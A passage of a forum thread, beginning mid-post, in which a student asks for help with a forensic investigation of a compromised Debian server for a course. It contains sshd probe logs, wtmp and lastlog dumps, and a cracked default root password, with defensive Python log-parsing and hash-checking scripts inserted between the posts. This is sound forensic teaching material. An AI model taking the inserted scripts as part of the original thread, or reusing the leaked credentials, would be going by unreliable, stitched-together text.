    Apr 12 11:28:28 ServerGroep1 sshd[2996]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:28:28 ServerGroep1 sshd[2998]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:36:59 ServerGroep1 login[2925]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
    Apr 12 11:36:59 ServerGroep1 login[3062]: ROOT LOGIN  on 'tty1'
    Apr 12 11:37:49 ServerGroep1 sshd[3081]: Did not receive identification string from 10.13.37.10
    Apr 12 11:38:56 ServerGroep1 sshd[3092]: Did not receive identification string from 10.13.37.10
    Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session opened for user root by (uid=0)
    Apr 12 11:39:01 ServerGroep1 CRON[3100]: pam_unix(cron:session): session closed for user root
    Apr 12 11:44:13 ServerGroep1 sshd[3139]: Did not receive identification string from 10.13.37.10
    Apr 12 11:44:21 ServerGroep1 sshd[3143]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
    Apr 12 11:44:21 ServerGroep1 sshd[3145]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
    Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2
    ==============
    What we do think to know:
    - A user “cees” has been added to both the passwd and shadow file
    - The account Leo has been used to gain FTP access
    - evil.host and cc4u.lan are malicious hosts.
    - The IPs 10.0.0.14 and 10.13.37.10 are suspicious at least
    - There have been several attempts to find vulnerabilities in the website
    - A hacker framework has been used to find vulnerabilities
    - A bash script in Leo’s folder contains very suspicious information. For example: the touch command was used to alter timestamps.
    - The suspicious activities start April 12, 2010

    Questions remaining:
    - The exact number of hackers is unknown.
    - The identity of the hackers is unknown.
    - Can we still trust our timestamps since we know the touch command has been used?
    - When was the first server access? And how did they gain access in the first place?

    Could you please advise on how to investigate this issue more thoroughly?
    Help is much appreciated.
     
    Last edited: May 24, 2011
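    One way to make the scattered log excerpts above easier to reason about is to merge them into a single per-host timeline. The script below is an added example, not something posted in this thread; it parses a handful of lines copied from the proftpd.log, auth.log and access.log excerpts quoted above (the syslog-style lines carry no year, so 2010 is assumed from the apache timestamps, and all times are treated as the server's local time), classifies each line, sorts everything by time and counts event types per source IP.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Sample input: a few lines copied from the log excerpts quoted in the post above.
PROFTPD_LINES = """\
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER DBSNMP: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.
"""
AUTH_LINES = """\
Apr 12 11:20:17 ServerGroep1 sshd[3106]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:28:21 ServerGroep1 sshd[2992]: Did not receive identification string from 10.13.37.10
Apr 12 11:57:24 ServerGroep1 sshd[3205]: Accepted password for root from 10.0.0.10 port 54049 ssh2
"""
ACCESS_LINES = """\
10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"
"""

# syslog prefix: "Mon DD HH:MM:SS host prog[pid]: rest" (proftpd omits the colon)
SYSLOG_RE = re.compile(r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
                       r"\S+ (?P<prog>\w+)\[(?P<pid>\d+)\]:? (?P<rest>.*)$")
# proftpd body: "ServerGroep1 (name[::ffff:ip]): message"
PROFTPD_RE = re.compile(r"^\S+ \((?P<name>[^\[]+)\[(?:::ffff:)?(?P<ip>[^\]]+)\]\): (?P<msg>.*)$")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# apache combined log format
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                       r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def classify_proftpd(msg):
    """Return (event category, user name or '') for one proftpd message."""
    m = re.match(r"USER (\S+): no such user found", msg)
    if m:
        return "ftp_bad_user", m.group(1)
    m = re.match(r"USER (\S+): Login successful", msg)
    if m:
        return "ftp_login_ok", m.group(1)
    if "too-long command" in msg:
        return "ftp_long_command", ""
    return "ftp_other", ""


def classify_sshd(msg):
    m = re.match(r"Accepted \w+ for (\S+) from", msg)
    if m:
        return "ssh_login_ok", m.group(1)
    if msg.startswith(("Protocol major versions differ", "Did not receive identification string")):
        return "ssh_probe", ""   # version banner games, as Nmap's scripts do
    return "ssh_other", ""


def parse_syslog_line(line, year):
    """Parse a proftpd.log or auth.log line into an event dict, or None if unparsable."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    prog, rest = m["prog"], m["rest"]
    if prog == "proftpd":
        p = PROFTPD_RE.match(rest)
        if not p:
            return None
        event, user = classify_proftpd(p["msg"])
        return dict(ts=ts, source="proftpd", host=p["ip"], name=p["name"],
                    event=event, user=user, detail=p["msg"])
    if prog == "sshd":
        ipm = IPV4_RE.search(rest)
        event, user = classify_sshd(rest)
        return dict(ts=ts, source="sshd", host=ipm.group(1) if ipm else "", name="",
                    event=event, user=user, detail=rest)
    return None


def parse_access_line(line):
    """Parse an apache combined-format line; timestamps are converted to naive local time."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    ua, status = m["ua"], int(m["status"])
    if "w3af" in ua.lower():
        event = "web_scanner"
    elif status == 404:
        event = "web_probe_404"
    else:
        event = "web_request"
    return dict(ts=ts, source="apache", host=m["ip"], name="", event=event, user="",
                detail=f"{m['req']} -> {status} UA={ua}")


def build_timeline(proftpd_text, auth_text, access_text, year):
    """Merge all three logs into one list of events ordered by time (stable for ties)."""
    events = []
    for line in proftpd_text.splitlines() + auth_text.splitlines():
        ev = parse_syslog_line(line, year)
        if ev:
            events.append(ev)
    for line in access_text.splitlines():
        ev = parse_access_line(line)
        if ev:
            events.append(ev)
    events.sort(key=lambda e: e["ts"])
    return events


def events_by_host(events):
    """Count event categories per source IP, e.g. to see who probed and who finally logged in."""
    by = defaultdict(Counter)
    for e in events:
        by[e["host"]][e["event"]] += 1
    return by


if __name__ == "__main__":
    for e in build_timeline(PROFTPD_LINES, AUTH_LINES, ACCESS_LINES, 2010):
        print(e["ts"], e["source"].ljust(7), e["host"].ljust(12), e["event"], e["user"])
    print(dict(events_by_host(build_timeline(PROFTPD_LINES, AUTH_LINES, ACCESS_LINES, 2010))))
```

    On the real server the three string constants would be replaced by the full files (and the rotated copies, proftpd.log.1 and so on); lines that do not match are skipped rather than guessed at, so it is worth counting them separately to make sure the unparsed remainder is noise and not a log format you missed. The per-host counts are what turn "several failed attempts, then a success" into something you can point at: which IP did the scanning, which IP got the successful login, and how far apart those are.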
  2. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    I would recommend the following (disclaimer: I'm no web ninja :) ) :

    Not decide anything until you have actual proof; early conclusions can mislead.

    Useful stuff to check:

    Do you have /var/log/secure for ssh/sudo logins and connections?
    Do you have process account (pacct) enabled? If you do, you can read the log for every successfully executed command on the system. This can help you try to trace the activity some more.

    Have you tried disassembling the new touch command and the suspicious jpg file. At the very least, examine them with strings command to see if there are any useful strings in there. Can you also use file to see whether that job is indeed an image format, because extensions are meaningless.

    Did you check md5sum for important system utilities, like ps, top, lsof, netstat? Compare to a different system of same spec. If these are changed, you most certainly have a problem.

    Those are some pointers that could help you.

    Regards,
    Mrk
     
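    The md5sum comparison suggested above can be driven from the manifests Debian installs with every package: /var/lib/dpkg/info/<package>.md5sums holds one "<md5>  <path relative to />" line per file (ps and top come from the procps package, netstat from net-tools, lsof from lsof). The script below is an added example, not code from this thread; it runs a constructed scenario in a temporary directory so it works anywhere, and its main block checks the real packages when run on a Debian host.

```python
import hashlib
import os
import tempfile
from pathlib import Path

DPKG_INFO = "/var/lib/dpkg/info"          # where dpkg keeps <package>.md5sums


def parse_md5sums(text):
    """Parse dpkg's manifest format: '<md5>  <path relative to />' per line."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, rel = line.partition("  ")
        manifest[rel.strip()] = digest.lower()
    return manifest


def load_dpkg_manifest(package, info_dir=DPKG_INFO):
    """Read the manifest dpkg installed for `package`, or {} if it is not present."""
    path = Path(info_dir, f"{package}.md5sums")
    return parse_md5sums(path.read_text()) if path.is_file() else {}


def md5_of_file(path, chunk=1 << 16):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_manifest(manifest, root="/"):
    """Map each manifest path to 'ok', 'modified' or 'missing', resolved under `root`."""
    results = {}
    for rel, expected in manifest.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            results[rel] = "missing"
        elif md5_of_file(path) != expected:
            results[rel] = "modified"
        else:
            results[rel] = "ok"
    return results


def flagged(results):
    """Paths that need a closer look, sorted so reports are stable."""
    return sorted(rel for rel, status in results.items() if status != "ok")


# Constructed sample contents (stand-ins for real binaries; not from the investigated host).
GENUINE_PS = b"#!/bin/sh\necho genuine ps\n"
GENUINE_NETSTAT = b"#!/bin/sh\necho genuine netstat\n"
REPLACED_NETSTAT = b"#!/bin/sh\necho replaced netstat\n"


def demo():
    """Scratch root with ps intact, netstat replaced and lsof missing; returns the verdicts."""
    with tempfile.TemporaryDirectory() as root:
        bindir = Path(root, "bin")
        bindir.mkdir()
        (bindir / "ps").write_bytes(GENUINE_PS)
        (bindir / "netstat").write_bytes(REPLACED_NETSTAT)
        manifest_text = (
            f"{hashlib.md5(GENUINE_PS).hexdigest()}  bin/ps\n"
            f"{hashlib.md5(GENUINE_NETSTAT).hexdigest()}  bin/netstat\n"
            f"{'0' * 32}  bin/lsof\n"
        )
        return verify_manifest(parse_md5sums(manifest_text), root)


if __name__ == "__main__":
    print("demo:", demo())
    for pkg in ("procps", "net-tools", "lsof"):
        manifest = load_dpkg_manifest(pkg)
        print(pkg, flagged(verify_manifest(manifest)) if manifest else "manifest not found")
```

    Two caveats matter for evidence. The md5sums files live on the same disk the intruder had root on, so a manifest taken from the compromised host only proves that file and manifest still agree with each other; the hashes to trust are the ones from a clean install of the same package versions, or from the original .deb files, which is the comparison suggested above. And the script should be run from a known-good Python and kernel (a live CD mounting the disk read-only), since a rootkit that has replaced ps can just as easily lie to a hashing tool running on the live system.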
  3. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Thanks for your reply!

    I do not have a folder or file called secure in log.

    I do not know if it was. However, I cannot find /var/log/account/pacct nor any file called pacct.

    I don't know what you mean by the first. About the latter: the .jpg seems to be a normal .jpg, also when opened by notepad.

    No, but I will do that. I will go look for a Debian 5.0.4 installation and check those files. However, I do think this might be a bit out of our investigation leap.

    I will reply with the results.
    In the meantime: can you think of any more locations I can check? The most important questions we try to answer at this time:
    - How did they gain access in the first place?
    - Can we prove the IPs 10.0.0.14 and 10.13.37.10 actually have HACKED into our system? We know they have tried to attack the system. We also know they have gained access to the system. We do not know however if they gained access through hacking (or any other way, for example keylogging and then using someone else's account), nor do we know if they actually successfully hacked the system at all.

    Thank you very much!
     
  4. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    I have found something suspicious, but I'm not sure how to interpret the data.

    The file /var/log/wtmp contains logins and logouts. It contains:

    Code:
    2.6.26-2-686
    tty3
    LOGIN
    tty4
    LOGIN
    tty2
    LOGIN
    tty1
    LOGIN
    tty5
    LOGIN
    tty6
    LOGIN
    tty1
    root
    tty1
    root
    ftpd3412
    cc4u.lan
    pts/0
    ts/0leo
    cc4u.lan
    ftpd3412
    cc4u.lan
    pts/0
    ftpd3534
    cc4u.lan
    pts/0
    ts/0leo
    cc4u.lan
    ftpd3534
    cc4u.lan
    pts/0
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    tty1
    tty1
    2.6.26-2-686
    tty1
    LOGIN
    2.6.26-2-686
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    pts/0
    ts/0administrator
    cc4u.lan
    pts/0
    2.6.26-2-686
    reboot
    
    What does this prove? I can see that there’s a ts/0leo (does this mean Leo accessed the server via TS?), and also “cc4u.lan”. Does this mean it’s the host that logged in, or a username?

    In the file "lastlog", we find this:
    Code:
    Ktty1
    Kpts/0
    cc4u.lan
    Kpts/0
    cc4u.lan
    
    I don’t know how to interpret this either.
     
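    The dump above is what `strings` makes of a binary file: wtmp and lastlog are arrays of fixed-size C structs, and `strings` simply prints every run of printable bytes, so fields that happen to be full (no terminating NUL) get glued to the next one. The decoder below is an added example, not something posted in this thread. It assumes the glibc layouts: struct utmp is 384 bytes (ut_type, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256], exit status, session, a 32-bit timeval, ut_addr_v6[4], padding) and struct lastlog is 292 bytes per UID (int32 ll_time, ll_line[32], ll_host[256]). The sample images are constructed to resemble the strings in the post, not copied from the real files; on the server you would read the real ones with `open("/var/log/wtmp", "rb").read()`.

```python
import re
import socket
import struct
from datetime import datetime, timezone

# glibc layouts (bits/utmp.h). 'struct utmp' is 384 bytes on i386 and x86_64 alike,
# because ut_session and the ut_tv timeval are stored as 32-bit fields; 'struct lastlog'
# is one 292-byte record per UID: int32 ll_time, char ll_line[32], char ll_host[256].
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)        # 384
LASTLOG_FMT = "<i32s256s"
LASTLOG_SIZE = struct.calcsize(LASTLOG_FMT)  # 292
UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS",
            8: "DEAD_PROCESS", 9: "ACCOUNTING"}


def _cstr(raw):
    """Fixed-width C string: stop at the first NUL (a completely full field has none)."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_wtmp(data):
    """Decode every complete record of a wtmp/utmp image into one dict per record."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        addr = f[11:15]  # ut_addr_v6: an IPv4 address occupies the first word only
        ip = socket.inet_ntoa(struct.pack("<i", addr[0])) if addr[0] and not any(addr[1:]) else ""
        records.append({"type": UT_TYPES.get(f[0], str(f[0])), "pid": f[1],
                        "line": _cstr(f[2]), "id": _cstr(f[3]), "user": _cstr(f[4]),
                        "host": _cstr(f[5]), "ip": ip,
                        "time": datetime.fromtimestamp(f[9], tz=timezone.utc)})
    return records


def parse_lastlog(data):
    """Decode lastlog: record i belongs to UID i; ll_time == 0 means 'never logged in'."""
    entries = {}
    for uid, off in enumerate(range(0, len(data) - len(data) % LASTLOG_SIZE, LASTLOG_SIZE)):
        ll_time, line, host = struct.unpack_from(LASTLOG_FMT, data, off)
        if ll_time:
            entries[uid] = {"time": datetime.fromtimestamp(ll_time, tz=timezone.utc),
                            "line": _cstr(line), "host": _cstr(host)}
    return entries


def sessions(records):
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same line."""
    open_by_line, out = {}, []
    for r in records:
        if r["type"] == "USER_PROCESS":
            open_by_line[r["line"]] = r
        elif r["type"] == "DEAD_PROCESS" and r["line"] in open_by_line:
            s = open_by_line.pop(r["line"])
            out.append({"user": s["user"], "line": s["line"], "host": s["host"],
                        "start": s["time"], "end": r["time"]})
    for s in open_by_line.values():  # still open, or the logout was never recorded
        out.append({"user": s["user"], "line": s["line"], "host": s["host"],
                    "start": s["time"], "end": None})
    return out


def strings_view(data, min_len=4):
    """Roughly what `strings` prints: runs of printable bytes, NUL-less neighbours glued."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# ---- constructed sample images, modelled on the strings in the post (not the real files) ----
def make_record(ut_type, pid, line, ut_id, user, host, ts, ipv4="0.0.0.0"):
    addr = struct.unpack("<i", socket.inet_aton(ipv4))[0]
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ut_id.encode(), user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, addr, 0, 0, 0)


def make_lastlog(entries, nuids):
    recs = [entries.get(uid, (0, "", "")) for uid in range(nuids)]
    return b"".join(struct.pack(LASTLOG_FMT, ts, ln.encode(), h.encode()) for ts, ln, h in recs)


T = int(datetime(2010, 4, 12, 10, 36, 38, tzinfo=timezone.utc).timestamp())  # 12:36:38 +0200
SAMPLE_WTMP = b"".join([
    make_record(2, 0, "~", "~~", "reboot", "2.6.26-2-686", T - 7200),  # kernel release in ut_host
    make_record(6, 3087, "tty1", "1", "LOGIN", "", T - 3600),          # getty waiting on tty1
    make_record(7, 3087, "tty1", "1", "root", "", T - 3500),           # console root login
    make_record(7, 3412, "pts/0", "ts/0", "leo", "cc4u.lan", T, "10.10.10.10"),
    make_record(8, 3412, "pts/0", "ts/0", "", "cc4u.lan", T + 438, "10.10.10.10"),
])
SAMPLE_LASTLOG = make_lastlog({0: (T - 3500, "tty1", ""), 1000: (T, "pts/0", "cc4u.lan")}, 1001)

if __name__ == "__main__":
    for s in sessions(parse_wtmp(SAMPLE_WTMP)):
        print(s)
    print(strings_view(SAMPLE_WTMP)[:6], strings_view(SAMPLE_LASTLOG))
```

    Decoded this way the dump reads naturally: "reboot" together with "2.6.26-2-686" is a BOOT_TIME record (the kernel release is stored in ut_host), "LOGIN" on tty1 to tty6 are LOGIN_PROCESS records for the waiting gettys, and "cc4u.lan" is the ut_host field of a remote session, so it is the connecting host, not a user name. "ts/0leo" is the 4-byte ut_id field ("ts/0", completely full, hence no NUL) immediately followed by ut_user "leo", which is why `strings` shows them as one word. The "K" in front of "tty1" and "pts/0" in lastlog is the last byte (0x4B) of the little-endian 32-bit ll_time for April 2010, which sits directly before ll_line. `last -f /var/log/wtmp` and `lastlog` do the same decoding on a running system; the script is useful on a disk image, and for spotting records whose timestamps run backwards, which a tool that only prints them will not flag.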
  5. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Hi, I don't know Unix, but I noticed you mentioned the IPs 10.0.0.14 and 10.13.37.10

    I see similar IPs when I do ipconfig /all on my XP comp

    10.gif

    If that's normal, then I've got a REAL problem, unlike your assignment.

    So either it's normal for you to see them or ?
     
  6. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Hi,

    You don't need to worry. The class A IP range (10.x.x.x) is an internal range. It cannot be used on the internet.
    I'm not fully sure on why it's showing those as your WINS Servers, because I believe WINS is pretty outdated and replaced by DNS.

    It does depend a bit on your internal network structure. There could (in theory) be a rogue WINS server on your network, but the chances of that are close to null I'd say.
     
  7. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Eagle,

    To check real file type: "file <filename>"

    To disassemble, you run: "objdump -S -D <file> > <output>".
    But then, without really knowing assembly, having symbols or sources, this could be tricky. Still, you might be able to find something useful in there.

    But BEFORE you do that: "strings <filename>".

    You cannot be sure those are real IPs. It is also possible that someone had root on a remote box and sudo-ed or su-ed to another user and another and so forth, so that's not a real indication of anything.

    Packets could have been mangled to appear to be coming from those sources. You might want to consult the switch/router that forwards communication to your web server. You might also want to use arp to see what MAC addresses are in the neighborhood, and then cross reference those to IPs and hostnames referenced in DNS, files, etc, if at all.

    How was the access gained? I can only guess.
    Weak password for user leo? Weak ftp permissions?
    Weak system permissions that allowed the user to cd outside the ftp directory into the system and make changes of all kinds? A vulnerability in your web server that allows an attacker to gain a shell?

    wtmp/utmp/lastlog are not reliable, even on fully healthy systems.
    Not all apps/utilities register there. TTY-less users won't show there.

    BTW, are you having fun with your assignment? :)

    Personally, I prefer productive code monkeying over security ... :)


    Regards,
    Mrk
     
  8. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Haha, sure it's fun.
    My education focuses on information security management, so hacking is a part of it and law (legal issues) too. We are going to simulate a lawsuit next week using the evidence found during the investigation.

    We also found out using MD5 decrypting that user ‘root’ used ‘toor’ as his password, for both the public website and the shell. So we might be able to prove negligence (by ProvID) as well.

    Unfortunately we haven’t found much more information than we already had.

    It’s quite interesting for sure!

    Thank you very much for your information!
     
  9. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Hi, thanks :thumb: I presumed they are internal IPs on both mine and yours. But as you were asking about the 10 range on yours, I wondered if you were concerned that something fishy was happening there, due to you posting about them? Which made me wonder about my 10 range.

    I'm on XP/SP2, if that makes any difference?

    OK :thumb:
     
  10. mack_guy911

    mack_guy911 Registered Member

    Joined:
    Mar 21, 2007
    Posts:
    2,677
    sounds like your school teaches CEH (Certified Ethical Hacker) and CHFI (Certified Hacking Forensic Investigator)

    :D
     
  11. mack_guy911

    mack_guy911 Registered Member

    Joined:
    Mar 21, 2007
    Posts:
    2,677

    root and toor are the BackTrack 3 defaults; I don't know if they still use the same on BackTrack 5.
     
  12. Eagle Creek

    Eagle Creek Global Moderator

    Joined:
    Jul 27, 2004
    Posts:
    734
    Location:
    The Netherlands
    Well, any IP can be suspicious depending on the situation. First of all, 10.10.10.10's hostname was "cc4u". cc4u is the same name used in the defaced website. Second, "10.13.37.10" is also used by cc4u. Not only that, but this IP contains "1337": hacker slang for 'elite'.

    No, although SP2 isn't supported anymore since 13-07-2010! You need to upgrade to SP3 to receive the latest security updates.

    It might, but it does not ;). We haven't hacked either. We learn about hacking techniques, perform some basic things (like path traversal, cross-site scripting, SQL injections, etc) but focus on investigating. We aren't taught to become investigators either ;).

    That might be the case, but I doubt it has any relevance :).
     
  13. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @ Eagle Creek

    Thanks for the feedback :thumb:
     